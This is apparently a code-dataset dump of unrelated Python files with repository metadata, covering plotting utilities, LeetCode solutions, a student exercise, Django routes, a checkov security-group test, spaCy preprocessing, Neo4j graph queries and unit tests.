a2fc2a5c3716b85c177c3f61dc7da465f8ff83a3
|
[
"MIT"
] |
permissive
|
PacktPublishing/Machine-Learning-for-Cybersecurity-Cookbook
|
1d7a50fb79b5da8c411eda9dc9cface4d0f78125
|
19b9757020cbcb09d9bb4249605fbb9c7322d92b
|
refs/heads/master
| 2023-05-12T08:29:13.569598
| 2023-01-18T10:19:07
| 2023-01-18T10:19:07
| 222,411,828
| 250
| 164
|
MIT
| 2023-05-01T20:11:44
| 2019-11-18T09:33:53
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 6,395
|
py
|
import numpy as np
import torch
from matplotlib import pyplot as plt
from PIL import Image
from abs_models import utils as u
def visualize_image(ax, im, title=None, clear=False, **kwargs):
if clear:
ax.cla()
ax.imshow(im, **kwargs)
if title is not None:
ax.set_title(title)
ax.axis('off')
return(ax)
def plot(ax, y_datas, x_data=None, title=None, clear=True,
scale=None, legend=None):
if not any(isinstance(i, list) for i in y_datas):
y_datas = [y_datas]
if clear:
ax.clear()
if x_data is None:
x_data = range(len(y_datas[0]))
# acutal plotting
plots = []
for y_data in y_datas:
pl, = ax.plot(x_data, y_data)
plots.append(pl)
if legend:
ax.legend(plots, legend)
if scale is not None:
ax.set_yscale(scale)
if title is not None:
ax.set_title(title)
return ax
def scatter(ax, x_data, y_data, title=None, clear=True):
if clear:
ax.clear()
ax.scatter(x_data, y_data)
if title is not None:
ax.set_title(title)
def subplots(*args, height=6, width=15, **kwargs):
fig, ax = plt.subplots(*args, squeeze=False, **kwargs)
if height is not None:
fig.set_figheight(height)
if width is not None:
fig.set_figwidth(width)
return fig, ax
class Visualizer:
def __init__(self):
self.plots = {}
self.i = -1
self.reset()
def reset(self):
self.ny = 4
self.nx = 4
fig = plt.figure()
plt.ion()
fig.show()
fig.canvas.draw()
self.fig = fig
self.i = 0
# for key in self.plots.keys():
# self.plots[key].ax = self.get_next_plot()
def add_scalar(self, name, y, x):
y = u.t2n(y)
if name in self.plots.keys():
self.plots[name].x.append(x)
self.plots[name].y.append(y)
else:
self.plots[name] = PlotObj(x, y, self.get_next_plot())
self.plots[name].ax.clear()
plot(self.plots[name].ax, self.plots[name].y,
self.plots[name].x, title=name)
self.fig.canvas.draw()
def add_image(self, name, img, x):
if not isinstance(img, np.ndarray):
img = u.t2n(img)
img = img.squeeze()
if name not in self.plots.keys():
self.plots[name] = self.plots[name] \
= PlotObj(0, 0, self.get_next_plot())
visualize_image(self.plots[name].ax, img, title=name, cmap='gray')
def get_next_plot(self):
self.i += 1
ax = self.fig.add_subplot(self.nx, self.ny, self.i)
return ax
class PlotObj:
def __init__(self, x, y, ax):
self.x = [x]
self.y = [y]
self.ax = ax
# visualize hidden space
class RobNNVisualisor(object):
def __init__(self):
self.xl = []
self.yl = []
self.cl = []
def generate_data(self, model, loader, cuda=False):
for i, (test_data, test_label) in enumerate(loader):
if i == int(np.ceil(400 / loader.batch_size)):
break
x = test_data
yt = test_label
x = x.to(u.dev())
model.forward(x)
latent = model.latent.cpu().data.numpy().swapaxes(0, 1).squeeze()
self.xl += latent[0].tolist()
self.yl += latent[1].tolist()
self.cl += yt.data.numpy().tolist()
def visualize_hidden_space(self, fig, ax, model=None,
loader=None, cuda=False,
reload=False, colorbar=False):
if self.xl == [] or reload:
self.generate_data(model, loader, cuda=cuda)
cmap = plt.cm.get_cmap("viridis", 10)
pl = ax.scatter(self.xl, self.yl, c=self.cl, label=self.cl,
vmin=-0.5, vmax=9.5, cmap=cmap)
if colorbar:
fig.colorbar(pl, ax=ax, ticks=range(10))
return ax
def fig2img(fig):
"""
@brief Convert a Matplotlib figure to a PIL Image in RGBA format
and return it
@param fig a matplotlib figure
@return a Python Imaging Library ( PIL ) image
"""
# put the figure pixmap into a numpy array
buf = fig2data(fig)
w, h, d = buf.shape
return Image.frombytes("RGBA", (w, h), buf.tostring())
def fig2data(fig):
"""
@brief Convert a Matplotlib figure to a 4D numpy array with
RGBA channels and return it
@param fig a matplotlib figure
@return a numpy 3D array of RGBA values
"""
# draw the renderer
fig.canvas.draw()
# Get the RGBA buffer from the figure
w, h = fig.canvas.get_width_height()
buf = np.frombuffer(fig.canvas.tostring_argb(), dtype=np.uint8)
buf.shape = (w, h, 4)
# canvas.tostring_argb give pixmap in ARGB mode.
# Roll the ALPHA channel to have it in RGBA mode
buf = np.roll(buf, 3, axis=2)
return buf
# adapted from https://github.com/lanpa/tensorboard-pytorch
def tens2scattters(tens, lims=None, labels=None):
tens_np = u.tens2numpy(tens)
labels = u.tens2numpy(labels)
# draw
fig = plt.figure()
ax = plt.gca()
ax.scatter(tens_np[0], tens_np[1], c=labels)
plt.axis('scaled')
if lims is not None:
ax.set_xlim(lims[0], lims[1])
ax.set_ylim(lims[0], lims[1])
return fig2data(fig)
def fig2data(fig):
fig.canvas.draw()
# Now we can save it to a numpy array.
data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
plt.close()
return data
def visualize_latent_distr(CNN, nd, limit=2, n_grid=100):
limit = 2
n_grid = 100
fig, ax = subplots(1, 1, width=7, height=6)
fig.subplots_adjust(right=0.8)
grids = [(np.linspace(-limit, limit, n_grid)) for i in range(nd)]
xys = np.array(np.meshgrid(*grids))
xys = np.moveaxis(xys, 0, -1).reshape(n_grid ** nd, nd)
outs = CNN.forward(torch.from_numpy(xys[:, :, None, None]).type(torch.cuda.FloatTensor)) # noqa: E501
outs = u.t2n(outs.squeeze())
sc = ax[0, 0].scatter(xys[:, 0], xys[:, 1], c=(outs - np.min(outs)) / (np.max(outs) - np.min(outs))) # noqa: E501
cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
fig.colorbar(sc, cax=cbar_ax)
return fig2data(fig)
if __name__ == '__main__':
fig, ax = subplots(2)
print(ax)
|
[
"dineshchaudhary@packtpub.com"
] |
dineshchaudhary@packtpub.com
|
bfb42af3796dc24682eb5e3c0ed9198db2b7b387
|
3ff9821b1984417a83a75c7d186da9228e13ead9
|
/No_0222_Count Complete Tree Nodes/by_binary_search.py
|
006a5cadc6ca612d6efcf92d477269380d8c036e
|
[
"MIT"
] |
permissive
|
brianchiang-tw/leetcode
|
fd4df1917daef403c48cb5a3f5834579526ad0c2
|
6978acfb8cb767002cb953d02be68999845425f3
|
refs/heads/master
| 2023-06-11T00:44:01.423772
| 2023-06-01T03:52:00
| 2023-06-01T03:52:00
| 222,939,709
| 41
| 12
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,269
|
py
|
'''
Description:
Given a complete binary tree, count the number of nodes.
Note:
Definition of a complete binary tree from Wikipedia:
In a complete binary tree every level, except possibly the last, is completely filled, and all nodes in the last level are as far left as possible. It can have between 1 and 2h nodes inclusive at the last level h.
Example:
Input:
1
/ \
2 3
/ \ /
4 5 6
Output: 6
'''
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def countNodes(self, root: TreeNode) -> int:
def helper( node: TreeNode):
root = node
if not node:
# Quick response for empty tree
return 0
height = 0
while node:
node = node.left
height += 1
if height == 1:
# Quick response for tree with one level only
return 1
# boundary of node numbering on last level
left, right = 2 ** (height - 1), (2 ** height - 1)
# For complete binary tree, the leftmost node on last level must exist
last_exist = left
# Launch binary search to find the numbering of last non-empty node on last level
while left <= right:
cur = root
mid = left + (right-left) // 2
# path finding for node with numbering with mid
for h in range(height-2, -1, -1):
mask = 1 << h
if mid & mask :
cur = cur.right
else:
cur = cur.left
mask >>= 1
if cur is not None:
# update latest finding on last level
last_exist = mid
left = mid + 1
else:
right = mid - 1
return last_exist
# -------------------------------
return helper( root )
# n : the number of nodes in binary tree
## Time Complexity: O( (log n )^2 )
#
# The overhead in time is the cost of height of complete binary tree * cost of binary search on bottom level
# It takes O( h ) * O( log n) = O( log n ) * O( log n ) = O( (log n )^2 ) in total.
## Space Complexity: O( 1 )
#
# The overhead in space is the storage for loop index and temporary variable, which are of O( 1 )
def test_bench():
root = TreeNode(1)
root.left = TreeNode(2)
root.right = TreeNode(3)
root.left.left = TreeNode(4)
root.left.right = TreeNode(5)
root.right.left = TreeNode(6)
# expected output:
'''
6
'''
print( Solution().countNodes(root = root) )
return
if __name__ == '__main__':
test_bench()
|
[
"brianchiang1988@icloud.com"
] |
brianchiang1988@icloud.com
|
d0e16e2419d18241a0865e98ba48b2a17e51f348
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/49/usersdata/87/17853/submittedfiles/pico.py
|
79eb44db0e38ef045bf5cae68bc141b72a01085b
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def pico(lista):
cont=0
for i in range (0,len(lista),1):
if i==0:
if lista[i]>lista[i+1]:
cont=cont+1
if lista[i+1]<lista[i]:
cont=cont+1
return True
else:
return False
a=[]
n=input("digite valor da quantidade de elementos:")
for i in range (0,n,1):
a.append(input('digite elementos:'))
if pico(a):
print("S")
else:
print("N")
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
1721ea9ddcd5726fab2dd4be394836b06cc14ae7
|
ee5f91b0ae20ff1379da6dfa67eb27b402edcb1f
|
/user_app/urls.py
|
3e1ad01d32211e4ea2d1a61e31f2a8fa5222ca77
|
[] |
no_license
|
cs-fullstack-master/django-ModelForm1-ic
|
bc4e936fc9f5f701dd493c38f197aa1c382b9c9e
|
5654b26304da6a38b2807bf0cafc6bfe841f0a41
|
refs/heads/master
| 2020-04-25T14:09:00.682561
| 2019-10-03T19:36:50
| 2019-10-03T19:36:50
| 172,831,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.urls import path
from user_app import views
urlpatterns = [
path('', views.index, name = 'index'),
path('users/', views.users, name='users'),
]
|
[
"kevin@code-crew.org"
] |
kevin@code-crew.org
|
e68c1ecbbf40865932991688780f2519ddfe4a08
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/tests/terraform/graph/checks_infra/attribute_solvers/not_contains_solver/test_solver.py
|
3fa9383ab971c6b2dedc995c4e68a45f5018bb47
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,902
|
py
|
import os
from parameterized import parameterized_class
from tests.terraform.graph.checks_infra.test_base import TestBaseSolver
TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))
@parameterized_class([
{"graph_framework": "NETWORKX"},
{"graph_framework": "IGRAPH"}
])
class TestNotContainsSolver(TestBaseSolver):
def setUp(self):
self.checks_dir = TEST_DIRNAME
super(TestNotContainsSolver, self).setUp()
def test_public_virtual_machines(self):
root_folder = '../../../resources/public_virtual_machines'
check_id = "PublicVMs"
should_pass = ['aws_default_security_group.default_security_group_closed']
should_fail = ['aws_default_security_group.default_security_group_open']
expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
def test_list_cidr_blocks(self):
root_folder = '../../../resources/security_group_list_cidr_blocks'
check_id = "PublicSG"
should_pass = ['aws_security_group.passed_cidr_block', 'aws_security_group.failed_cidr_blocks']
should_fail = []
expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
def test_list_cidr_blocks_specific(self):
root_folder = '../../../resources/security_group_list_cidr_blocks'
check_id = "SpecificBlockSG"
should_pass = ['aws_security_group.failed_cidr_blocks']
should_fail = ['aws_security_group.passed_cidr_block']
expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
|
[
"noreply@github.com"
] |
bridgecrewio.noreply@github.com
|
6e77e8a9684379dd99bad07ebcedd73de9c6a811
|
453e245dcb67a75f671d5e6067af13c21acd4f97
|
/1.1 Data/7-make_regression.py
|
2e01163f5ed0e87a56fe08c45d21b11ebcf5ca64
|
[] |
no_license
|
ahmedatef1610/scikit-learn-library-for-machine-learning
|
c828f7510cd9a7df41e7aece31c08ea00d69bb4f
|
f12be8c1702c413742328a75f60b9b1f78a3c2d3
|
refs/heads/main
| 2023-04-05T01:23:46.970931
| 2021-04-12T09:16:26
| 2021-04-12T09:16:26
| 356,732,567
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# Import Libraries
from sklearn.datasets import make_regression
# ----------------------------------------------------
# load regression data
'''
X ,y = make_regression(n_samples=100, n_features=100, n_informative=10,
n_targets=1, bias=0.0, effective_rank=None,
tail_strength=0.5, noise=0.0, shuffle=True, coef=False,
random_state=None)
'''
X, y = make_regression(n_samples=10000, n_features=500, shuffle=True)
# X Data
print('X Data is \n', X[:10])
print('X shape is ', X.shape)
# y Data
print('y Data is \n', y[:10])
print('y shape is ', y.shape)
|
[
"ahmedatef1610@gmail.com"
] |
ahmedatef1610@gmail.com
|
fcd432036bd5e790ae9758afc44a70e2fbbe4378
|
df6d9d599568e7437f614c1404b26f74ebab47b0
|
/Preprocessing/processingresources.py
|
d0c1c999456a19e54b8c9b11cdf69113d8e5fe7a
|
[
"Apache-2.0"
] |
permissive
|
akshay-verma/semeval2019-hyperpartisan-bertha-von-suttner
|
cacd535d7234a175e4d05a0c0ccbc6bde70495d1
|
1de672f5c7a5be3f9fff89c091b6211a85b69a8b
|
refs/heads/master
| 2020-05-17T16:56:35.563614
| 2019-04-29T20:09:08
| 2019-04-29T20:09:08
| 183,834,154
| 0
| 0
|
Apache-2.0
| 2019-04-28T00:24:43
| 2019-04-28T00:24:43
| null |
UTF-8
|
Python
| false
| false
| 7,058
|
py
|
"""
Classes representing "processing resources"
"""
import preprocessing
import xml.etree.ElementTree
import tldextract
from collections import Counter
import features
import json
from numbers import Number
import htmlparser
import sys
class PrArticle2Line:
def __init__(self, stream, featureslist, addtargets=True):
self.stream = stream
self.features = features.features2use(featureslist)
self.mp_able = False
self.addtargets = addtargets
self.need_et = False
def __call__(self, article, **kwargs):
values = features.doc2features(article, self.features)
strings = []
for i in range(len(values)):
val = values[i]
if isinstance(val, str):
strings.append(val)
elif isinstance(val, Number):
strings.append(str(val))
elif isinstance(val, list):
strings.append(json.dumps(val))
elif isinstance(val, dict):
strings.append(json.dumps(val))
else:
# raise Exception("Not a known type to convert to string: {} for {}, feature {}, article id {}".
# format(type(val), val, self.features[i], article['id']))
print("Not a known type to convert to string: {} for {}, feature {}, article id {}".
format(type(val), val, self.features[i], article['id']))
if self.addtargets:
print(article['id'], article.get('target'),
article.get('bias'), article.get('domain'),
"\t".join(strings), file=self.stream, sep="\t")
else:
print("\t".join(strings), file=self.stream)
class PrAddTarget:
def __init__(self, a2target, a2bias, a2url):
self.a2target = a2target
self.a2bias = a2bias
self.a2url = a2url
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
id = article['id']
target = self.a2target[id]
bias = self.a2bias[id]
url = self.a2url[id]
article['target'] = target
article['bias'] = bias
article['url'] = url
class PrAddTitle:
def __init__(self):
self.mp_able = True
self.need_et = True
def __call__(self, article, **kwargs):
element = article['et']
attrs = element.attrib
title = preprocessing.cleantext(attrs["title"])
article['title'] = title
class PrAddText:
def __init__(self):
self.mp_able = True
self.need_et = False
self.parser = None # initialize later, do not want to pickle for the pipeline
def __call__(self, article, **kwargs):
if self.parser is None:
self.parser = htmlparser.MyHTMLParser()
self.parser.reset()
self.parser.feed(article['xml'])
self.parser.close()
pars = self.parser.paragraphs()
article['pars'] = pars
text = " ".join(pars)
article['text'] = text
class PrRemovePars:
def __init__(self):
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
del article['pars']
class PrFilteredText:
"""
Calculate the single filtered text field text_all_filtered, must already have nlp
"""
def __init__(self):
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
import nlp
text_tokens = article['text_tokens']
title_tokens = article['title_tokens']
tokens = nlp.filter_tokens([t[0] for t in title_tokens])
tokens.append("<sep_t2d>")
if article.get('link_domains_all'):
tokens.extend(["DOMAIN_" + d for d in article['link_domains']])
tokens.append("<sep_d2a>")
tokens.extend(nlp.filter_tokens([t[0] for sent in text_tokens for t in sent]))
token_string = " ".join(tokens)
article['text_all_filtered'] = token_string
class PrNlpSpacy01:
"""
Tokenise and POS-tag the title and article.
The title gets converted into a list of list word, POS, lemma.
The article gets converted into a list of
sentences containing a list of lists word, POS, lemma for the sentence.
:return:
"""
def __init__(self):
import spacy
self.mp_able = True
self.initialized = False
self.need_et = False
self.nlp = None
def initialize(self):
if self.initialized:
return
import spacy
self.nlp = spacy.load("en_core_web_sm", disable=["parser"])
self.nlp.add_pipe(self.nlp.create_pipe('sentencizer'))
self.initialized = True
def __call__(self, article, **kwargs):
# process each paragraph separately to avoid getting sentences
# crossing paragraphs
if not self.initialized:
self.initialize()
pars = article['pars']
# store the raw number of paragraphs
article['n_p'] = len(pars)
# print("DEBUG: number of pars", len(pars))
n_p_filled = 0
# print("\n\nDEBUG: {} the texts we get from the paragraphs: ".format(article['id']), pars)
docs = list(self.nlp.pipe(pars))
allthree = [[[t.text, t.pos_, t.lemma_] for t in s] for doc in docs for s in doc.sents]
article['n_p_filled'] = n_p_filled
article['text_tokens'] = allthree
ents = [ent.text for doc in docs for ent in doc.ents if ent.text[0].isupper()]
article['text_ents'] = ents
title = article['title']
doc = self.nlp(title)
allthree = [(t.text, t.pos_, t.lemma_) for s in list(doc.sents) for t in s]
article['title_tokens'] = allthree
ents = [ent.text for ent in doc.ents if ent.text[0].isupper()]
article['title_ents'] = ents
class PrSeqSentences:
"""
Creates fields: title_sent, domain_sent, article_sent, title and article generated from the
token lists for the title and article text (using the original token string)
The sentences for the article are enclosed in the special <bos> and <eos> markers.
"""
def __init__(self):
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
article_tokens = article['text_tokens']
title_tokens = article['title_tokens']
title_sent = " ".join([t[0] for t in title_tokens])
domain_sent = ""
if article.get('link_domains_all'):
domain_sent = " ".join(["DOMAIN_" + d for d in article['link_domains']])
all = []
first = True
for sent in article_tokens:
if first:
first = False
else:
all.append("<splt>")
# all.append("<bos>")
for t in sent:
all.append(t[0])
# all.append("<eos>")
article_sent = " ".join(all)
article['article_sent'] = article_sent
article['domain_sent'] = domain_sent
article['title_sent'] = title_sent
|
[
"johann.petrak@gmail.com"
] |
johann.petrak@gmail.com
|
85e5435fddc690666b601db7f53c32927be2aa4f
|
4c9e3a963aef1d8f0cea9edc35e3c5ffc64a87d1
|
/python-webpy/wiki/model.py
|
15f7152764ee641c2d6b368787597759d85ce4d6
|
[] |
no_license
|
hackrole/daily-program
|
d6820d532a9ebb8132676e58da8e2382bd459b8f
|
cff87a09f03ce5bd9e186b0302bead6cd8484ab5
|
refs/heads/master
| 2021-01-21T13:11:55.287908
| 2015-04-21T14:34:36
| 2015-04-21T14:34:36
| 17,940,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 931
|
py
|
import web
db = web.database(dbn='sqlite', db='sql/main.db')
def get_pages():
return db.select('pages', order='id DESC')
def get_page_by_url(url):
"""
Arguments:
- `url`:
"""
try:
return db.select('pages', where='url=$url', vars=locals())[0]
except IndexError:
return None
def get_page_by_id(id):
"""
Arguments:
- `id`:
"""
try:
return db.select('pages', where='id=$id', vars=locals())[0]
except IndexError:
return None
def new_page(url, title, text):
db.insert('pages', url=url, title=title, content=text)
def del_page(id):
"""
Arguments:
- `id`:
"""
db.delete('pages', where='id=$id', vars=locals())
def update_page(id, url, title, text):
"""
Arguments:
- `id`:
- `url`:
"""
db.update('pages', where='id=$id', vars=locals(), url=url, title=title, content=text)
|
[
"daipeng123456@gmail.com"
] |
daipeng123456@gmail.com
|
fbbb1076d82b8b95b154e02ca11dad432c9ea418
|
4f728a8177d041ca8cbd616ec58858eb3fc4c204
|
/aleph/graph/queries.py
|
2d88424dc2923d7a720bd74908da3e839dc9b6b2
|
[
"MIT"
] |
permissive
|
nivertech/aleph
|
9bafa122a99be82ae09219a4abdf5ca3aa05bc55
|
20c773352e2c533867c75b0e658c6ff4a58c47a2
|
refs/heads/master
| 2020-12-11T08:14:43.634439
| 2016-08-08T10:47:44
| 2016-08-08T10:47:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,561
|
py
|
import logging
from aleph import authz
from aleph.graph.schema import NodeType, EdgeType
log = logging.getLogger(__name__)
class GraphQuery(object):
def __init__(self, graph, data):
self.graph = graph
self.data = data
@property
def limit(self):
try:
return min(int(self.data.get('limit', 15)), 5000)
except:
return 15
@property
def offset(self):
try:
return max(int(self.data.get('offset', 0)), 0)
except:
return 0
def ignore(self):
return self.data.getlist('ignore')
def _bool(self, name, default=False):
"""Fetch a query argument, as a boolean."""
v = unicode(self.data.get(name, '')).strip().lower()
if not len(v):
return default
return v in ['true', '1', 'yes', 'y', 't']
def _as_json(self, results):
"""Helper to make query responses more uniform."""
return {
'status': 'ok',
'limit': self.limit,
'offset': self.offset,
'results': results
}
def to_dict(self):
return self._as_json(self.execute())
class NodeQuery(GraphQuery):
def text(self):
text = self.data.get('text')
if text is not None:
text = unicode(text).strip()
if len(text) < 1:
text = None
else:
text = '(?i).*%s.*' % text
return text
def collection_id(self):
collection_id = self.data.getlist('collection_id')
return authz.collections_intersect(authz.READ, collection_id)
def query(self):
args = {
'acl': authz.collections(authz.READ),
'limit': self.limit,
'offset': self.offset,
'text': self.text(),
'ignore': self.ignore(),
'collection_id': self.collection_id()
}
filters = []
filters.append('ncoll.alephCollection IN {collection_id}')
filters.append('ocoll.alephCollection IN {acl}')
if args['text'] is not None:
filters.append('node.name =~ {text}')
if len(args['ignore']):
filters.append('NOT (node.id IN {ignore})')
q = "MATCH (node)-[:PART_OF]->(ncoll:Collection) " \
"MATCH (node)-[r]-(other) " \
"MATCH (other)-[:PART_OF]->(ocoll:Collection) " \
"WHERE %s " \
"WITH node, count(r) AS degree " \
"ORDER BY degree DESC " \
"SKIP {offset} LIMIT {limit} " \
"RETURN node, degree "
q = q % ' AND '.join(filters)
# print args, q
return q, args
def execute(self):
query, args = self.query()
nodes = []
for row in self.graph.run(query, **args):
node = NodeType.dict(row.get('node'))
node['$degree'] = row.get('degree')
nodes.append(node)
return nodes
class EdgeQuery(GraphQuery):
def source_collection_id(self):
collection_id = self.data.getlist('source_collection_id')
if not len(collection_id):
collection_id = self.data.getlist('collection_id')
return authz.collections_intersect(authz.READ, collection_id)
def target_collection_id(self):
collection_id = self.data.getlist('target_collection_id')
if not len(collection_id):
collection_id = self.data.getlist('collection_id')
return authz.collections_intersect(authz.READ, collection_id)
def source_id(self):
node_id = self.data.getlist('source_id')
if not len(node_id):
node_id = self.data.getlist('node_id')
return node_id
def target_id(self):
node_id = self.data.getlist('target_id')
if not len(node_id):
node_id = self.data.getlist('node_id')
return node_id
def query(self):
args = {
'acl': authz.collections(authz.READ),
'limit': self.limit,
'offset': self.offset,
'ignore': self.ignore(),
'source_collection_id': self.source_collection_id(),
'target_collection_id': self.target_collection_id(),
'source_id': self.source_id(),
'target_id': self.target_id()
}
directed = '>' if self._bool('directed') else ''
filters = []
filters.append('sourcecoll.alephCollection IN {source_collection_id}')
filters.append('targetcoll.alephCollection IN {target_collection_id}')
if len(args['ignore']):
filters.append('NOT (rel.id IN {ignore})')
if len(args['source_id']):
filters.append('source.id IN {source_id}')
if len(args['target_id']):
filters.append('target.id IN {target_id}')
q = "MATCH (source)-[rel]-%s(target) " \
"MATCH (source)-[:PART_OF]->(sourcecoll:Collection) " \
"MATCH (target)-[:PART_OF]->(targetcoll:Collection) " \
"WHERE %s " \
"RETURN source.id AS source, rel, target.id AS target " \
"SKIP {offset} LIMIT {limit} "
filters = ' AND '.join(filters)
q = q % (directed, filters)
return q, args
def execute(self):
query, args = self.query()
edges = []
for row in self.graph.run(query, **args):
data = EdgeType.dict(row.get('rel'))
data['$source'] = row.get('source')
data['$target'] = row.get('target')
edges.append(data)
return edges
|
[
"friedrich@pudo.org"
] |
friedrich@pudo.org
|
58acf6941d6f455e0defc79c0d205906fa6f200f
|
847986bccb499dca707f7ad8ea3b7406e5178c7a
|
/testing_effectiveness/show_structure_metrics.py
|
ed1b836e811d70b25b693d7ead8010ea042c3f2d
|
[] |
no_license
|
jianing-li/asynchronous-spatio-temporal-spike-metric
|
08818c00510d00c593f081aed078e9047d8d8b97
|
71b31956ba47e83e43138498aceb441f184282cd
|
refs/heads/master
| 2021-07-13T16:51:20.120434
| 2020-10-03T10:01:24
| 2020-10-03T10:43:57
| 203,725,140
| 16
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,157
|
py
|
"""
Function: Show searching error curves for spike metrics.
Author: Jianing Li, lijianing@pku.edu.cn, Peking University, Apr. 1st, 2019.
"""
import numpy as np
import pickle
from matplotlib import pyplot as pl
# load noise ratio steps.
noise_ratio_steps = open('../datasets/search_moving_target/noise_ratio_steps.pkl','rb')
noise_ratio_steps = pickle.load(noise_ratio_steps)
# load kernel cube errors.
kernel_cube_errors = open('../datasets/search_moving_target/kernel_cube_errors.pkl','rb')
kernel_cube_errors = pickle.load(kernel_cube_errors)
kernel_cube_errors = kernel_cube_errors[np.argsort(kernel_cube_errors)]
# load kernel train errors.
kernel_train_errors = open('../datasets/search_moving_target/kernel_train_errors.pkl','rb')
kernel_train_errors = pickle.load(kernel_train_errors)
kernel_train_errors = kernel_train_errors[np.argsort(kernel_train_errors)]/2 # show better curve
# load kernel train errors using polarity interference.
kernel_train_pif_errors = open('../datasets/search_moving_target/kernel_train_pif_errors.pkl','rb')
kernel_train_pif_errors = pickle.load(kernel_train_pif_errors)
kernel_train_pif_errors = kernel_train_pif_errors[np.argsort(kernel_train_pif_errors)]/2 # show better curve
# show spike metrics for structure attribute.
fig = pl.figure()
pl.plot(noise_ratio_steps, kernel_train_errors, '--', color='blue', markersize=3, linewidth=3, figure=fig, label='KMST[17]')
pl.plot(noise_ratio_steps, kernel_train_pif_errors, '-.', color='limegreen' ,markersize=3, linewidth=3, figure=fig, label='KMST-P[23]')
pl.plot(noise_ratio_steps, kernel_cube_errors,'-', color='red', markersize=3, linewidth=3, figure=fig, label='ASTSM')
font1 = {'family': 'Times New Roman', 'size': 20}
font2 = {'size': 16}
pl.xlabel(r'$N_\tau$',font1)
pl.grid(axis='y', linestyle='-.')
pl.ylabel('Tracking errors / pixel', font1)
pl.xlim((0, 2))
pl.ylim((0, 60))
pl.xticks(np.linspace(0, 2, 5), fontsize=16)
pl.yticks(fontsize=16)
pl.yticks(np.linspace(0, 60, 5), fontsize=16)
#pl.legend(loc = 0, prop=font2)
pl.legend(loc='upper center', bbox_to_anchor=(0.24, 0.98), prop=font2)
pl.show()
|
[
"you@example.com"
] |
you@example.com
|
c2795bb8eb76134679bae4e2d4db6248d789a084
|
7ec38beb6f041319916390ee92876678412b30f7
|
/src/hands_on_python/Ch11/test_survey.py
|
d791bfdea04977060bae33655c2b31987ac63c44
|
[] |
no_license
|
hopensic/LearnPython
|
3570e212a1931d4dad65b64ecdd24414daf51c73
|
f735b5d865789843f06a623a4006f8883d6d1ae0
|
refs/heads/master
| 2022-02-18T23:11:30.663902
| 2022-02-12T17:51:56
| 2022-02-12T17:51:56
| 218,924,551
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
import unittest
from hands_on_python.Ch11.survey import AnonymousSurvey
class TestAnonymousSurvey(unittest.TestCase):
def test_store_single_response(self):
question = "What language did you first learn to speak?"
my_survey = AnonymousSurvey(question)
my_survey.store_response('English')
self.assertIn('English', my_survey.responses)
def test_store_three_responses(self):
question = "What language did you first learn to speak?"
my_survey = AnonymousSurvey(question)
responses = ['English', 'Spanish', 'Mandarin']
for response in responses:
my_survey.store_response(response)
for response in responses:
self.assertIn(response, my_survey.responses)
unittest.main
|
[
"hopensic@gmail.com"
] |
hopensic@gmail.com
|
7d0e800f405196bc4560f3977f641aaec29c8f6c
|
f038216be109882668ccd89b71efe0127d845bfb
|
/LeetCode/maximum_product_subarray.py
|
549754da4a93cc85ee54958809337371159a4be4
|
[] |
no_license
|
kunalt4/ProblemSolvingDSandAlgo
|
84b29a7eb2f73ea3b0450ed4b0707bc2d031c00d
|
6a796dd1a778049418d47bc3b94b82c7a2680d26
|
refs/heads/master
| 2021-08-16T23:05:39.452968
| 2020-09-16T00:02:06
| 2020-09-16T00:02:06
| 221,677,287
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
class Solution:
def maxProduct(self, nums: List[int]) -> int:
max_prod = nums[0]
min_prod = nums[0]
ans = nums[0]
#Max product could be curr_max * curr_num or for negatives, curr_min * curr_num
for i in range(1,len(nums)):
x = max(nums[i], max_prod*nums[i], min_prod*nums[i]) #Calculate max upto current point
min_prod = min(nums[i], max_prod*nums[i], min_prod*nums[i]) #Calculate min upto current point
max_prod = x
ans = max(max_prod, ans)
return ans
|
[
"noreply@github.com"
] |
kunalt4.noreply@github.com
|
